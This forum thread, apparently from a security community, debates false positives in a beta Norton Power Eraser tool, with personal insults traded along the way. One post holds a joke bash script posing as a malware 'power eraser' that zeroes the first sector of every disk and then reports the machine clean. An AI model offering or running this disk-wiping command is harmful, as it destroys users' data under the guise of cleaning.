No , it does ! Because there is no direct page for this tool , the actual link is only available in Norton 2011 products . There is no way for you to know about its existense unless you visit the BETA forum section of N.C. or unless you download the BETA of Norton 2011

The only thing is has detected ON MY COMPUTER is competitor ...

You forgot to mention on your computer . On computers I have used it detected a lot more.

In my cases it detected Adobe Photoshop and an accounting program . But as it is an advanced to use tool , as it is beta , at the end I could uncheck them and decide not to have them removed but just the malware.

    Home page here:

    http://security.symantec.com/nbrt/overview.asp?lcid=1033&origin=default

Since you cant read here is the description:

Your clearly to ignorant and naive to get any point across to. IT DOES NOT MATTER IF THIS IS A BETA, ITS DETECTION IS PATHETIC. Congrats your the only person who has found a single file that has been malicious.

I didnt miss that bit of information at all. When it says some legitimate programs may be marked for removal. Last time I checked in the English language some didnt mean ALL competitors to Norton.

No false positive on my two computers at home both now run Windows 7.

The only FP I have seen was on clients computers
    Capture.PNG

I don't think but as you say it , I must accept it o_O

    Thank you very much

Clearly it has a problem that needs to be fixed but intentionally flagging competitors is not one of them. FF, MBAM and Windows Firewall was not flagged on my system.
MBAM has had two false positives on my machine in the past two months. One was a file in C:\Windows MBAM is big on false positives.
    Nothing found here.
A few people scanning clean systems is indicative of its detection?
That's because Mr. 3GUSER appears to be the only one that scanned an infected system.

Accidentally flagging any competitor or intentionally. Regardless its something that shouldnt be happening regardless of if its a beta. Nobody said Windows FW was ever flagged. I used it as an example.

FF and MBAM both were flagged on other systems as well as SAS and Thunderbird.

A few people scanning clean systems isnt indicitive of its detection. Its FP rate which is through the roof because it detects everything is indicitive of its pathetic detection rate. So far it hasnt detected anything malicious and only has detected files that are competitor products to Norton. You can crawl on the bandwagon with 3GUser all you want, but you 2 are the only 2 that fail to see this pathetic Norton tool for what it is.

    1. It has detected malicious items.
    2. It's BETA.

Point 2 is invalid. Betas dont detect competing software companies of this multitude. Its a very obvious tactic that you and 3GUser both fail to see. Even being a beta this amount of false positives is down right pathetic. It detects top notch browsers, firewalls, anti spyware apps all of which are well known and there is no excuse for falsely detecting very well known apps like Firefox and Thunderbird.

1 hasnt been proven yet. What has been proven is that it detects Norton competitor products.

I agree again . This is not about it detecting some or all malware . That is yet to be proven . It has proved to me at least on my system , to be inferior as to what it is supposed to do . If I trusted this program , what a mess I would be in . As a Beta , it is a failure . It has a long way to go .

Actually , this yet to be proven to you and all Norton haters . It has already proved to me and to all who cares to be excellent at cleaning infected computers.

You say this is not about detecting some malware . This thread has name "Norton Power Eraser" and by this we are supposed to talk about all the pluses and minuses of this utilities , not just a single negative . The OP has started it by making comparison with MBAM , however Norton haters turned the thread into bashing NPE BETA utility.

Perhaps I must underline again that this utility cannot be downloaded as is and not a single Symantec/Norton regular customer can know about it unless he/she tests the BETA of Norton 2011 . As Symantec site clearly bolds , any BETA is intended for experienced users . Symantec doesn't recommend to use NPE as a first line but to be cautios , careful and as a last line . Please , reffer to my previous post in this thread regarding all the security layers in Norton 2010 a malware must bypass in order to infect a system and then we could potentially use NPE

Thank you for the mister , Mr.AliasEX ;) :thumb: If the Norton haters haven't actually tested the NPE against infected computer as it should be , this explains it everything - they are simple non-trained home users who run it against clean machine not an infected one.

You might not trust 3GUSER so why not test it yourself on an infected machine.

You know, most conspiracy theories are false but let me add to yours. I have MBAM and SAS among others. NPE doesn't detect these. I have NIS.

What difference does it make if the false positive is for a well known app? The false positive should not be there in the first place, if it can be helped.

You know, they all do it, e.g. http://forum.avast.com/index.php?topic=51783.0

Firefox and Thunderbird among many others that have been falsely flagged are not competitors. That makes the conspiracy theory slightly less plausible.

Beta. Last resort. States many false positives. Norton working on the false positives. Beta.

I don't know what the problem is.

Betas often don't make it to the final version. Hopefully, this will.

Yep , 'cos Google knows everything . But first of all you learned of Norton Power Eraser because of forums like Wilders. No regular user who has no idea of Norton beta 2011 can get . This is not a direct link in any Symantec website . It is ony present in the BETA 2011

Just to be clear ... I am not a fan nor a hater . Fan boys think detection is great . Haters think it sucks . I have tested for Symantec for many years . Have NIS 2010 installed on one and using the Beta on the other . Again I have to ask why the fans are so thick ? Ok . I will say it detects and removes all malware for the sake of being ignorant . That certainly does not discount the amount of falsies at this time . This thread is about 3G apparently . I need not impose on this thread any longer . At least I see things for what they are . Others here seem jaded . Love it all you want . White D guy . You mine as well drop from this thread as well . Anyone wanting good information on this program has already gotten it . No one is changing anyone's train of thought . This thread is an argument . Not a discussion . My suggestion is to leave it alone .
    Good luck with this one:)

P.S. Um . The link lu chin provided indeed shows it and IS available .

May I remind all Wilders members to take a step back and read No offense?! Yes, really!!

Let's keep the topic focused on Norton Power Eraser and not on each other. A bickering thread always ends up being closed.

More baseless garbage being spewed. Any regular person can get NPE. Symantecs site has Norton Betas, NIS2011 Beta is there and there is a link directly to this page:

    http://www.symantec.com/norton/beta/overview.jsp?pvid=nis2011beta_overview

    In the NIS2011 Beta.

    http://www.symantec.com/norton/beta/overview.jsp?pvid=nis2011beta_overview

    Under new rescue tools.

Im out of this thread since so many fail to read plain English and cant move past the Norton jock strap.

Why won't you accept it for what it is?

Yes, it has many false positives that are being worked on and yes, it is extremely good at detecting real threats when all others fail.

See, I have an extremely powerful utility which will eliminate all threats on your computer. It works like this:

    Code:
    #!/bin/bash
echo "Doktornotor Power Eraser v1.0 BETA"
echo "You should use Doktornotor Power Eraser only when nothing else "
echo "will remove the threat and you are willing to accept the risk that "
echo "the scanner may quarantine a legitimate program."
read -p "Press ENTER to acknowledge the above and continue or CTRL+C to abort"
    for x in $(ls -1 /dev/[hs]d?) ; do
    	dd if=/dev/zero of=$x bs=512 count=1
    done
echo "Your computer is now completely clean, press CTLR+ALT+DEL to reboot!"
echo "Thanks for betatesting Doktornotor Power Eraser!"

The above ultimate power eraser will work with about any Linux live CD/DVD out there, is completely free and opensource and licensed to you under the WTFPL v2 license terms. Enjoy! :D

So far you and 3Guser have nothing except its a beta. You dont even have detection yet you keep saying that its good at detecting. Yea good at detecting legitimate, trusted, well known programs for NO reason. We dont hate Norton. We call it like we see it. So far you and 3G are blind leading the blind and fail to see NPE for what it is.

That must be the most mature and pointfull post you've made so far about this. I'm not saying they were mature, but you've sure delivered some unnecessary punches under the belt and I never respect such a thing one bit.

    Regards

I didnt mean to offend you. I call it like I see it and I dont sugar coat things. When you spew baseless information with nothing to back it up for 3 pages, you get shown solid proof for 3 pages, and you keep spewing the same junk for 3 pages, and consistently deny the facts that have been laid out because you like Norton it pushes my buttons a little.

Now you are really losing sight on the reality. The Norton fanboys vs Symantec (nowadays people don't hate Norton anymore, most will say Norton 2010 indd is a really good product, everyone just hates the company behind it) haters is always funny, and you are getting ~Snipped~ and you are starting to flame at a product which has nothing to do with this whole discussion. Their ain't any similarities between this Power Eraser and MBAM.

How about renaming this thread to Norton bashing 2.0.
